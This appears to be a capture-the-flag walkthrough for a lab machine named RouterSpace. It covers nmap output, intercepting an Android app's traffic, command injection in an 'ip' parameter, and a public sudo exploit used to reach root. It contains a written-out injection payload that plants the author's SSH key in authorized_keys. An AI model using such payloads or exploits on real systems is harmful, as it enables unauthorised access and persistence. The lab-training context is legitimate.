Nmap scan report for 10.10.11.148
Host is up (0.15s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| 256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_ 256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
80/tcp open http
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-90752
| Content-Type: text/html; charset=utf-8
| Content-Length: 83
| ETag: W/"53-1CPF2lTAVDqjw0ulBsW5R961pkE"
| Date: Wed, 06 Jul 2022 19:33:03 GMT
| Connection: close
| Suspicious activity detected !!! {RequestID: gDdeM 7Oi rA q Q dB 1qhNmgI }
| GetRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-15939
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
| ETag: W/"652c-17d476c9285"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 25900
| Date: Wed, 06 Jul 2022 19:33:01 GMT
| Connection: close
| <!doctype html>
| <html class="no-js" lang="zxx">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>RouterSpace</title>
| <meta name="description" content="">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/owl.carousel.min.css">
| <link rel="stylesheet" href="css/magnific-popup.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/themify-icons.css">
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-33000
| Allow: GET,HEAD,POST
| Content-Type: text/html; charset=utf-8
| Content-Length: 13
| ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
| Date: Wed, 06 Jul 2022 19:33:02 GMT
| Connection: close
| GET,HEAD,POST
| RTSPRequest, X11Probe:
| HTTP/1.1 400 Bad Request
|_ Connection: close
|_http-title: RouterSpace
We have two open ports, ssh on 22 and http on 80, and their versions have no serious vulnerabilities. Nothing to do with SSH for now, so lets enumerate port 80.
![[Pasted image 20220708232149.png]] Going to http://10.10.11.148/ we see a static html page, but there is a download button that downloads an APK file. ![[Pasted image 20220708232113.png]]
Now we need to know what this app is doing so we lets install it on an android enumator and configure burpsuite so it listen on all interfaces to intercept the traffic from the emulator. We can use any android emulator you like, i will use genymotion for this one.
First, we will configure burp to listen on all interfaces on port 8081. ![[Pasted image 20220708232808.png]]
Next, we need to configure proxy setting from Settings -> Wi-Fi -> Modify Network -> Proxy on the emulator. ![[Pasted image 20220708233000.png]]
Last step is to drag and drop the APK file to the emulator to install it. The application has ony "Check Status" button, when we click it and navigate to HTTP history tab in burpsuite we see a POST request to http://routerspace.htb with no response (because our machine doesn't know how to resolve routerspace.htb) ![[Pasted image 20220708233809.png]]
So lets add this hostname to hosts file. Now we see a response. ![[Pasted image 20220708234414.png]] ![[Pasted image 20220708233534.png]]
Lets send this request to the repeater to play with. The first thing came to my mind is that maybe the machine executes system command on the ip parameter like ping -c1 <ip> to check whether the specified ip is up or not, so i tried injecting whoami in the ip parameter. ![[Pasted image 20220708234702.png]] And it works and i am paul.
I have tried to get a reverse shell in various ways but failed, so i just put my ssh public key in authorized_keys file and SSHed into the machine with user paul.
Payload:
;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVd5Cr7JucC1oFvizD2p9lBPCGuWR7H7COIYtZnrwLJomv1jvt5P26ayTOrB44HkaPsFJlBX0r+IsUdfbg0C0THEWXK2YYuik5drXUapmyhoh+o/2+u/KPtdq6+XjaUQ712mXXK1pSC7QpHjTcyVjyvr0zjAUW+MZwo0uUsLaDa/wsoWoFDoJ0iZqtMw/uz9WtOywKMu425eRs5C2us1AebpAMn7FO3tDLPLgSv4z6XUfYDR7VtBCZNKiX6ob2VfEnKSNhPiMiGzWEnrEZec6Gb4jpcMsxazmHzN5lcRBvILaacRgYyIJom5aWI7F9YX5e+IIBj03f+VbMU4hgbZw7 > ~/.ssh/authorized_keys;
![[Pasted image 20220709010431.png]]
I ran linpeas.sh and quickly found that the sudo version may be vulnerable. ![[Pasted image 20220709021315.png]]
So i searched for public exploits for this version and found this repository.
https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit
I cloned this repo and couldn't transfer the files to the machine so i copied and pasted every file.
Finally, run make
then ./exploit
and we are root on the box!
![[Pasted image 20220709021724.png]]